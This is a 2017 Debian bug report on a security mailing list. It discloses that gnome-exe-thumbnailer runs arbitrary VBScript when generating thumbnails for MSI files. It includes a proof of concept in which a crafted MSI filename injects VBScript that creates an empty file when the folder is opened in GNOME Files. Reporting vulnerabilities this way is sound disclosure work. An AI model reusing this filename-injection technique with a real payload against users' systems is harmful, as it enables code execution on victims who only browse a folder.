[Secure-testing-team] Bug#868705: gnome-exe-thumbnailer: Thumbnail generation for MSI files executes arbitrary VBScript

Nils Dagsson Moskopp nils+debian-reportbug at dieweltistgarnichtso.net
Mon Jul 17 21:01:42 UTC 2017 

Package: gnome-exe-thumbnailer
Version: 0.9.4-2
Severity: grave
Tags: security
Justification: user security hole

Dear Maintainer,

the following PoC is copied verbatim from my post about the parsing issue:
http://news.dieweltistgarnichtso.net/posts/gnome-thumbnailer-msi-fail.html

Proof of Concept

Install Dependencies

On Debian GNU/Linux, install the packages gnome-exe-thumbnailer, nautilus and wixl. The wixl package is only needed to create MSI files that trigger the thumbnailer.

If the proof of concept does not work, install winetricks and run winetricks wsh56 to upgrade the Windows Script Host.

Create MSI Files

Create a file named poc.xml with the following content:

<?xml version="1.0" encoding="utf-8"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
<Product Version="1.0"/>
</Wix>

Execute the following Bourne Shell code:

wixl -o poc.msi poc.xml
cp poc.msi "poc.msi\",0):Set fso=CreateObject(\"Scripting.FileSystemObject\"):Set poc=fso.CreateTextFile(\"badtaste.txt\")'.msi"

Trigger Execution

Start GNOME Files and navigate to the folder with the MSI files. An empty file with the name badtaste.txt should appear.

*** End of the template - remove these template lines ***


-- System Information:
Debian Release: 9.0
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 3.16.0-4-686-pae (SMP w/1 CPU core)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: sysvinit (via /sbin/init)

Versions of packages gnome-exe-thumbnailer depends on:
ii  icoutils                         0.31.2-1.1
ii  imagemagick                      8:6.9.7.4+dfsg-11
ii  imagemagick-6.q16 [imagemagick]  8:6.9.7.4+dfsg-11
ii  libglib2.0-bin                   2.50.3-2

Versions of packages gnome-exe-thumbnailer recommends:
pn  wine                                                                 <none>
pn  wine64-tools | wine32-tools | wine64-development-tools | wine32-dev  <none>

gnome-exe-thumbnailer suggests no packages.

-- no debconf information

More information about the Secure-testing-team mailing list